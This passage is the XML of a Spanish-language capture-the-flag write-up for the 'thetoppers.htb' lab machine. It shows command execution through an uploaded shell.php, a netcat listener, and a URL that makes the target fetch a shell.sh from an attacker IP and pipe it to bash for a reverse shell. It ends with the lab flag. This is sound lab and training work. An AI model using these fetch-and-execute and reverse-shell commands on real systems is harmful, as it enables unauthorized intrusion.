        <w:t>http://thetoppers.htb/shell.php?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3119E191" w14:textId="4C53B0F2" w:rsidR="00CF295B" w:rsidRDefault="00CF295B" w:rsidP="00CF295B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05638C27" wp14:editId="71C276C7">
            <wp:extent cx="5612130" cy="1339215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091C" w14:textId="3D6787E5" w:rsidR="00CF295B" w:rsidRDefault="00CF295B" w:rsidP="00CF295B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF295B">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>La respuesta del servidor contiene el resultado de la ejecución del código de identificación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> comprobando que podemos mandar comandos a través del cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E44603" w14:textId="3D687EE9" w:rsidR="00CF295B" w:rsidRDefault="00CF295B" w:rsidP="00CF295B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF295B">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>A través de un shell inverso, activaremos el host remoto para que se vuelva a conectar a la dirección IP de nuestra máquina local en el puerto de escucha especificado. Podemos obtener la dirección IP tun0 de nuestra máquina local usando el siguiente comando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD97D12" w14:textId="2F3ACB6D" w:rsidR="00774C8F" w:rsidRDefault="00774C8F" w:rsidP="00774C8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F16F9AF" w14:textId="11D0ED2A" w:rsidR="00774C8F" w:rsidRDefault="00774C8F" w:rsidP="00774C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F1F7634" wp14:editId="6847DFAA">
            <wp:extent cx="5612130" cy="339598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227D" w14:textId="611C4108" w:rsidR="00774C8F" w:rsidRDefault="00774C8F" w:rsidP="00774C8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00774C8F">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Obtengamos un shell inverso creando un nuevo archivo shell.sh que contenga la siguiente carga útil de shell inverso bash que se conectará de nuevo a nuestra máquina local en el puerto 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F7CA91" w14:textId="46606882" w:rsidR="00A31081" w:rsidRDefault="00F31636" w:rsidP="00A31081">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B961B1D" wp14:editId="01DE00FD">
            <wp:extent cx="5612130" cy="619125"/>
            <wp:effectExtent l="0" t="0" r="762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1C8A7" w14:textId="288AF6BC" w:rsidR="00A31081" w:rsidRDefault="00A31081" w:rsidP="00A31081">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="751732A4" wp14:editId="5DA1F042">
            <wp:extent cx="5612130" cy="272415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4D34" w14:textId="0326CBF7" w:rsidR="00A31081" w:rsidRDefault="00A31081" w:rsidP="00A31081">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026B70D1" w14:textId="4E13AEFD" w:rsidR="00A31081" w:rsidRDefault="00A31081" w:rsidP="00A31081">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31081">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Iniciaremos un oyente ncat en nuestro puerto local 1337 usando el siguiente comando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642D0330" w14:textId="7286F0B3" w:rsidR="00A31081" w:rsidRDefault="00A31081" w:rsidP="00A31081">
      <w:r>
        <w:t>nc -nvlp 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCCEB54" w14:textId="0ECDB345" w:rsidR="00A31081" w:rsidRDefault="00A31081" w:rsidP="00A31081">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F32A524" wp14:editId="24F60FED">
            <wp:extent cx="5066667" cy="1238095"/>
            <wp:effectExtent l="0" t="0" r="635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6667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30C14" w14:textId="66D2FC9B" w:rsidR="00A31081" w:rsidRDefault="00A31081" w:rsidP="00A31081">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4731BFFE" w14:textId="3BA5C514" w:rsidR="00A31081" w:rsidRDefault="00A31081" w:rsidP="00A31081">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31081">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Iniciemos un servidor web en nuestra máquina local en el puerto 8000 y alojemos este archivo bash. Es crucial tener en cuenta aquí que este comando para alojar el servidor web debe </w:t>
      </w:r>
      <w:r w:rsidRPr="00A31081">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ejecutarse desde el directorio que contiene el archivo de shell inverso. Entonces, primero debemos viajar al directorio apropiado y luego ejecutar el siguiente comando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6186715F" w14:textId="48E7AA1A" w:rsidR="00A31081" w:rsidRDefault="00A31081" w:rsidP="00A31081">
      <w:r>
        <w:t>python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7589BF" w14:textId="29DA9356" w:rsidR="00A31081" w:rsidRDefault="00A31081" w:rsidP="00A31081">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56915080" wp14:editId="338D08DD">
            <wp:extent cx="4270443" cy="120130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6489" cy="120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0F2D" w14:textId="32D4BC1D" w:rsidR="00A31081" w:rsidRDefault="00A31081" w:rsidP="00A31081">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31081">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Podemos usar la utilidad curl para obtener el archivo shell inverso bash de nuestro host local y luego canalizarlo a bash para ejecutarlo. Por lo tanto, visitemos la siguiente URL que contiene la carga útil en el navegador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2641723D" w14:textId="0D1A03C1" w:rsidR="00A31081" w:rsidRDefault="00A610D5" w:rsidP="00A31081">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="0017787C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="es-419"/>
          </w:rPr>
          <w:t>http://thetoppers.htb/shell.php?cmd=curl%2010.10.16.152:8000/shell.sh|bash</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B2121BB" w14:textId="359BE9DA" w:rsidR="00A610D5" w:rsidRDefault="00A610D5" w:rsidP="00A31081">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3967217E" wp14:editId="297756FC">
            <wp:extent cx="5612130" cy="1518285"/>
            <wp:effectExtent l="0" t="0" r="7620" b="571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3FD61" w14:textId="49506D1A" w:rsidR="00F31636" w:rsidRDefault="00F31636" w:rsidP="00F31636">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Dandonos como resultado en el server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D76506B" w14:textId="6A0B04AA" w:rsidR="00975056" w:rsidRDefault="00975056" w:rsidP="00F31636">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Nota: Tuvimos problemas con la computadora por lo cual tuvimos que reiniciar y para retomar el ejercicio y terminarlo se nos asigno la ip 10.129.185.145</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA2C4E1" w14:textId="6DE0C444" w:rsidR="00F31636" w:rsidRDefault="00F31636" w:rsidP="00F31636">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CA18164" wp14:editId="3CEEC108">
            <wp:extent cx="5107021" cy="936692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14938" cy="938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5DA3" w14:textId="4CF3C56C" w:rsidR="00A610D5" w:rsidRDefault="00A610D5" w:rsidP="00A610D5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Y donde tenemos el puerto en escucha ya tenemos la Shell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA0E91" w14:textId="131E3F77" w:rsidR="00A610D5" w:rsidRDefault="00A610D5" w:rsidP="00A610D5">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FCEBA46" wp14:editId="615BA037">
            <wp:extent cx="5612130" cy="134556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4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577C6" w14:textId="5F8F380B" w:rsidR="00A610D5" w:rsidRDefault="00A610D5" w:rsidP="00A610D5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ahora para poder buscar la bandera para ahorrar tiempo podemos usar el comando locate flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1465F463" w14:textId="5EC46AF3" w:rsidR="00A610D5" w:rsidRDefault="00A610D5" w:rsidP="00A610D5">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65DC12FB" wp14:editId="46D1194D">
            <wp:extent cx="4428571" cy="80952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7CD29" w14:textId="3CD12D6A" w:rsidR="00A610D5" w:rsidRDefault="00A610D5" w:rsidP="00A610D5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Y podemos ver que nos da el resultado en la dirección /var/www/flag.txt para leer el contenido solo usamos el comando cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC821C9" w14:textId="0A1DE877" w:rsidR="00A610D5" w:rsidRDefault="00A610D5" w:rsidP="00A610D5">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19ABF05C" wp14:editId="7430AB06">
            <wp:extent cx="4333333" cy="1180952"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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1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BC445" w14:textId="76F26AD9" w:rsidR="00A610D5" w:rsidRPr="00A610D5" w:rsidRDefault="00A610D5" w:rsidP="00A610D5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Bandera: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A610D5">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>a980d99281a28d638ac68b9bf9453c2b</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A610D5" w:rsidRPr="00A610D5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1922"/>
    <w:rsid w:val="00056F1A"/>
    <w:rsid w:val="000B2473"/>
    <w:rsid w:val="000F05DF"/>
    <w:rsid w:val="00101922"/>
    <w:rsid w:val="0012096E"/>
    <w:rsid w:val="00121D7D"/>
    <w:rsid w:val="001C5E45"/>
    <w:rsid w:val="00222ACA"/>
    <w:rsid w:val="002D03AB"/>
    <w:rsid w:val="00346288"/>
    <w:rsid w:val="00376305"/>
    <w:rsid w:val="003813B8"/>
    <w:rsid w:val="003D2AE6"/>
    <w:rsid w:val="00400283"/>
    <w:rsid w:val="0048347C"/>
    <w:rsid w:val="0049140A"/>
    <w:rsid w:val="004D087C"/>
    <w:rsid w:val="00553434"/>
    <w:rsid w:val="00565330"/>
    <w:rsid w:val="006349ED"/>
    <w:rsid w:val="00667F6B"/>
    <w:rsid w:val="006D5440"/>
    <w:rsid w:val="0074381C"/>
    <w:rsid w:val="0074434A"/>
    <w:rsid w:val="00774C8F"/>
    <w:rsid w:val="00817D70"/>
    <w:rsid w:val="00822665"/>
    <w:rsid w:val="008277E8"/>
    <w:rsid w:val="00843561"/>
    <w:rsid w:val="00847932"/>
    <w:rsid w:val="00933809"/>
    <w:rsid w:val="00975056"/>
    <w:rsid w:val="009B0533"/>
    <w:rsid w:val="009F011D"/>
    <w:rsid w:val="009F0B19"/>
    <w:rsid w:val="00A23431"/>
    <w:rsid w:val="00A31081"/>
    <w:rsid w:val="00A310D8"/>
    <w:rsid w:val="00A610D5"/>
    <w:rsid w:val="00A74A4D"/>
    <w:rsid w:val="00AA18A6"/>
    <w:rsid w:val="00B148B6"/>
    <w:rsid w:val="00B33629"/>
    <w:rsid w:val="00B776FE"/>
    <w:rsid w:val="00BB0BF5"/>
    <w:rsid w:val="00C662A2"/>
    <w:rsid w:val="00CD4187"/>
    <w:rsid w:val="00CF295B"/>
    <w:rsid w:val="00D949F9"/>
    <w:rsid w:val="00DA2FE6"/>
    <w:rsid w:val="00DB2C4A"/>
    <w:rsid w:val="00E01067"/>
    <w:rsid w:val="00F31636"/>
    <w:rsid w:val="00FB5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518E2F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7E244641-2190-4DAD-902A-304E391470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9B053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B0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761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hyperlink" Target="http://thetoppers.htb/shell.php?cmd=curl%2010.10.16.152:8000/shell.sh|bash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image" Target="media/image1.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:mail@thetoppers.htb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553</TotalTime>
  <Pages>9</Pages>
  <Words>828</Words>
  <Characters>4556</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>37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 Paz</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Angel Paz</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-06T22:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-14T04:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>